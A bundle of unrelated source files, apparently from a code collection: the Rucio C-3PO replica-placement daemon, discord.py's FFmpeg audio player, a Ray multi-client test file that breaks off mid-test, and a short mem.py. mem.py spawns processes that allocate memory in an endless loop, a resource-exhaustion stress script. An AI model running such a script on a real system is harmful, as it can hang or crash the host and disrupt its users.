# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Thomas Beermann <thomas.beermann@cern.ch>, 2015-2021
# - Vincent Garonne <vincent.garonne@cern.ch>, 2017-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
'''
Dynamic data placement daemon.
'''
import logging
from datetime import datetime
from hashlib import md5
from json import dumps
from threading import Event, Thread
from time import sleep
from uuid import uuid4
from requests import post
from requests.auth import HTTPBasicAuth
from requests.exceptions import RequestException
from six import string_types
import rucio.db.sqla.util
from rucio.client import Client
from rucio.common import exception
from rucio.common.config import config_get, config_get_options
from rucio.common.logging import setup_logging
from rucio.common.types import InternalScope
from rucio.daemons.c3po.collectors.free_space import FreeSpaceCollector
from rucio.daemons.c3po.collectors.jedi_did import JediDIDCollector
from rucio.daemons.c3po.collectors.workload import WorkloadCollector
try:
from Queue import Queue
except ImportError:
from queue import Queue
GRACEFUL_STOP = Event()
def read_free_space(once=False, thread=0, waiting_time=1800):
"""
Thread to collect the space usage information for RSEs.
"""
free_space_collector = FreeSpaceCollector()
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
logging.info('collecting free space')
free_space_collector.collect_free_space()
timer = 0
def read_workload(once=False, thread=0, waiting_time=1800):
"""
Thread to collect the workload information from PanDA.
"""
workload_collector = WorkloadCollector()
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
logging.info('collecting workload')
workload_collector.collect_workload()
timer = 0
def print_workload(once=False, thread=0, waiting_time=600):
"""
Thread to regularly output the workload to logs for debugging.
"""
workload_collector = WorkloadCollector()
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
logging.info('Number of sites cached %d' % len(workload_collector.get_sites()))
for site in workload_collector.get_sites():
logging.info('%s: %d / %d / %d' % (site, workload_collector.get_cur_jobs(site), workload_collector.get_avg_jobs(site), workload_collector.get_max_jobs(site)))
timer = 0
def read_dids(once=False, thread=0, did_collector=None, waiting_time=60):
"""
Thread to collect DIDs for the placement algorithm.
"""
timer = waiting_time
while not GRACEFUL_STOP.is_set():
if timer < waiting_time:
timer += 10
sleep(10)
continue
did_collector.get_dids()
timer = 0
def add_rule(client, did, src_rse, dst_rse):
logging.debug('add rule for %s from %s to %s' % (did, src_rse, dst_rse))
r = client.add_replication_rule([did, ], 1, dst_rse, lifetime=604800, account='c3po', source_replica_expression=src_rse, activity='Data Brokering', asynchronous=True)
logging.debug(r)
def place_replica(once=False,
thread=0,
did_queue=None,
waiting_time=100,
dry_run=False,
sampling=False,
algorithms='t2_free_space_only_pop_with_network',
datatypes='NTUP,DAOD',
dest_rse_expr='type=DATADISK',
max_bytes_hour=100000000000000,
max_files_hour=100000,
max_bytes_hour_rse=50000000000000,
max_files_hour_rse=10000,
min_popularity=8,
min_recent_requests=5,
max_replicas=5):
"""
Thread to run the placement algorithm to decide if and where to put new replicas.
"""
try:
c3po_options = config_get_options('c3po')
client = None
if 'algorithms' in c3po_options:
algorithms = config_get('c3po', 'algorithms')
algorithms = algorithms.split(',')
if not dry_run:
if len(algorithms) != 1:
logging.error('Multiple algorithms are only allowed in dry_run mode')
return
client = Client(auth_type='x509_proxy', account='c3po', creds={'client_proxy': '/opt/rucio/etc/ddmadmin.long.proxy'})
vo = client.vo
instances = {}
for algorithm in algorithms:
module_path = 'rucio.daemons.c3po.algorithms.' + algorithm
module = __import__(module_path, globals(), locals(), ['PlacementAlgorithm'])
instance = module.PlacementAlgorithm(datatypes, dest_rse_expr, max_bytes_hour, max_files_hour, max_bytes_hour_rse, max_files_hour_rse, min_popularity, min_recent_requests, max_replicas)
instances[algorithm] = instance
params = {
'dry_run': dry_run,
'sampling': sampling,
'datatypes': datatypes,
'dest_rse_expr': dest_rse_expr,
'max_bytes_hour': max_bytes_hour,
'max_files_hour': max_files_hour,
'max_bytes_hour_rse': max_bytes_hour_rse,
'max_files_hour_rse': max_files_hour_rse,
'min_recent_requests': min_recent_requests,
'min_popularity': min_popularity
}
instance_id = str(uuid4()).split('-')[0]
elastic_url = config_get('c3po', 'elastic_url')
elastic_index = config_get('c3po', 'elastic_index')
ca_cert = False
if 'ca_cert' in c3po_options:
ca_cert = config_get('c3po', 'ca_cert')
auth = False
if ('elastic_user' in c3po_options) and ('elastic_pass' in c3po_options):
auth = HTTPBasicAuth(config_get('c3po', 'elastic_user'), config_get('c3po', 'elastic_pass'))
w = waiting_time
while not GRACEFUL_STOP.is_set():
if w < waiting_time:
w += 10
sleep(10)
continue
len_dids = did_queue.qsize()
if len_dids > 0:
logging.debug('(%s) %d did(s) in queue' % (instance_id, len_dids))
else:
logging.debug('(%s) no dids in queue' % (instance_id))
for _ in range(0, len_dids):
did = did_queue.get()
if isinstance(did[0], string_types):
did[0] = InternalScope(did[0], vo=vo)
for algorithm, instance in instances.items():
logging.info('(%s:%s) Retrieved %s:%s from queue. Run placement algorithm' % (algorithm, instance_id, did[0], did[1]))
decision = instance.place(did)
decision['@timestamp'] = datetime.utcnow().isoformat()
decision['algorithm'] = algorithm
decision['instance_id'] = instance_id
decision['params'] = params
create_rule = True
if sampling and 'error_reason' not in decision:
create_rule = bool(ord(md5(decision['did']).hexdigest()[-1]) & 1)
decision['create_rule'] = create_rule
# write the output to ES for further analysis
index_url = elastic_url + '/' + elastic_index + '-' + datetime.utcnow().strftime('%Y-%m') + '/record/'
try:
if ca_cert:
r = post(index_url, data=dumps(decision), verify=ca_cert, auth=auth)
else:
r = post(index_url, data=dumps(decision))
if r.status_code != 201:
logging.error(r)
logging.error('(%s:%s) could not write to ElasticSearch' % (algorithm, instance_id))
except RequestException as e:
logging.error('(%s:%s) could not write to ElasticSearch' % (algorithm, instance_id))
logging.error(e)
continue
logging.debug(decision)
if 'error_reason' in decision:
logging.error('(%s:%s) The placement algorithm ran into an error: %s' % (algorithm, instance_id, decision['error_reason']))
continue
logging.info('(%s:%s) Decided to place a new replica for %s on %s' % (algorithm, instance_id, decision['did'], decision['destination_rse']))
if (not dry_run) and create_rule:
# DO IT!
try:
add_rule(client, {'scope': did[0].external, 'name': did[1]}, decision.get('source_rse'), decision.get('destination_rse'))
except exception.RucioException as e:
logging.debug(e)
w = 0
except Exception as e:
logging.critical(e)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(once=False,
threads=1,
only_workload=False,
dry_run=False,
sampling=False,
algorithms='t2_free_space_only_pop_with_network',
datatypes='NTUP,DAOD',
dest_rse_expr='type=DATADISK',
max_bytes_hour=100000000000000,
max_files_hour=100000,
max_bytes_hour_rse=50000000000000,
max_files_hour_rse=10000,
min_popularity=8,
min_recent_requests=5,
max_replicas=5):
"""
Starts up the main thread
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
logging.info('activating C-3PO')
thread_list = []
try:
if only_workload:
logging.info('running in workload-collector-only mode')
thread_list.append(Thread(target=read_workload, name='read_workload', kwargs={'thread': 0, 'waiting_time': 1800}))
thread_list.append(Thread(target=print_workload, name='print_workload', kwargs={'thread': 0, 'waiting_time': 600}))
else:
logging.info('running in placement mode')
did_queue = Queue()
dc = JediDIDCollector(did_queue)
thread_list.append(Thread(target=read_free_space, name='read_free_space', kwargs={'thread': 0, 'waiting_time': 1800}))
thread_list.append(Thread(target=read_dids, name='read_dids', kwargs={'thread': 0, 'did_collector': dc}))
thread_list.append(Thread(target=place_replica, name='place_replica', kwargs={'thread': 0,
'did_queue': did_queue,
'waiting_time': 10,
'algorithms': algorithms,
'dry_run': dry_run,
'sampling': sampling,
'datatypes': datatypes,
'dest_rse_expr': dest_rse_expr,
'max_bytes_hour': max_bytes_hour,
'max_files_hour': max_files_hour,
'max_bytes_hour_rse': max_bytes_hour_rse,
'max_files_hour_rse': max_files_hour_rse,
'min_popularity': min_popularity,
'min_recent_requests': min_recent_requests,
'max_replicas': max_replicas}))
for t in thread_list:
t.start()
logging.info('waiting for interrupts')
while len(thread_list) > 0:
[t.join(timeout=3) for t in thread_list if t and t.is_alive()]
except Exception as error:
logging.critical(error)
|
player.py | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
CREATE_NO_WINDOW: int
if sys.platform != 'win32':
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
kwargs = {'stdout': subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f'popen-stdin-writer:{id(self):#x}'
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
raise ClientException(executable + ' was not found.') from None
except subprocess.SubprocessError as exc:
raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info('Preparing to terminate ffmpeg process %s.', proc.pid)
try:
proc.kill()
except Exception:
_log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)
if proc.poll() is None:
_log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
proc.communicate()
_log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
else:
_log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = 'ffmpeg',
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
args.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = 'ffmpeg',
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
codec = 'copy' if codec in ('opus', 'libopus') else 'libopus'
args.extend(('-map_metadata', '-1',
'-f', 'opus',
'-c:a', codec,
'-ar', '48000',
'-ac', '2',
'-b:a', f'{bitrate}k',
'-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get('executable')
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or 'native'
executable = executable or 'ffmpeg'
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, '_probe_codec_' + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', "
f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data['streams'][0]
codec = streamdata.get('codec_name')
bitrate = int(streamdata.get('bit_rate', 0))
bitrate = max(round(bitrate/1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
args = [executable, '-hide_banner', '-i', source]
proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate(timeout=20)
output = out.decode('utf8')
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b'')
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f'expected AudioSource not {original.__class__.__name__}.')
if original.is_opus():
raise ClientException('AudioSource must not be Opus encoded.')
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception('Calling the after function failed.')
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f'Exception in voice thread {self.name}'
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
mem.py | #!/usr/bin/python3
import multiprocessing
def worker():
a = []
while True:
i = 1
a.append(i)
for i in range(12):
p = multiprocessing.Process(target=worker)
p.start()
p.join()
print("Exit")
|
test_client_multi.py | import sys
import pytest
import ray
@pytest.mark.skipif(
sys.platform == "win32",
reason="PSUtil does not work the same on windows.")
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25001 --port 0"],
indirect=True)
def test_multi_cli_basic(call_ray_start):
ray.init("ray://localhost:25001")
cli1 = ray.init("ray://localhost:25001", allow_multiple=True)
cli2 = ray.init("ray://localhost:25001", allow_multiple=True)
with cli1:
a = ray.put(10)
with cli2:
b = ray.put(20)
# TODO better error message.
# Right now, it's EOFError actually
with pytest.raises(Exception):
ray.get(a)
with pytest.raises(Exception), cli2:
ray.get(a)
with pytest.raises(Exception), cli1:
ray.get(b)
c = ray.put(30)
with cli1:
assert 10 == ray.get(a)
with cli2:
assert 20 == ray.get(b)
with pytest.raises(Exception), cli1:
ray.get(c)
with pytest.raises(Exception), cli2:
ray.get(c)
@pytest.mark.skipif(
sys.platform == "win32",
reason="PSUtil does not work the same on windows.")
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25001 --port 0"],
indirect=True)
def test_multi_cli_init(call_ray_start):
cli1 = ray.init("ray://localhost:25001", allow_multiple=True) # noqa
with pytest.raises(
ValueError,
match="The client has already connected to the cluster "
"with allow_multiple=True. Please set allow_multiple=True"
" to proceed"):
ray.init("ray://localhost:25001")
cli2 = ray.init("ray://localhost:25001", allow_multiple=True) # noqa
cli1.disconnect()
cli2.disconnect()
ray.init("ray://localhost:25001")
cli1 = ray.init("ray://localhost:25001", allow_multiple=True) # noqa
@pytest.mark.skipif(
sys.platform == "win32",
reason="PSUtil does not work the same on windows.")
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25001 --port 0"],
indirect=True)
def test_multi_cli_func(call_ray_start):
@ray.remote
def hello():
return "world"
cli1 = ray.init("ray://localhost:25001", allow_multiple=True)
cli2 = ray.init("ray://localhost:25001", allow_multiple=True)
# TODO better error message.
# Right now, it's EOFError actually
with pytest.raises(Exception):
ray.get(hello.remote())
with cli1:
o1 = hello.remote()
assert "world" == ray.get(o1)
with cli2:
o2 = hello.remote()
assert "world" == ray.get(o2)
with pytest.raises(Exception), cli1:
ray.get(o2)
with pytest.raises(Exception), cli2:
ray.get(o1)
@pytest.mark.skipif(
sys.platform == "win32",
reason="PSUtil does not work the same on windows.")
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25001 --port 0"],
indirect=True)
def test_multi_cli_actor(call_ray_start):
@ray.remote
class Actor:
def __init__(self, v):
self.v = v
def double(self):
return self.v * 2
cli1 = ray.init("ray://localhost:25001", allow_multiple=True)
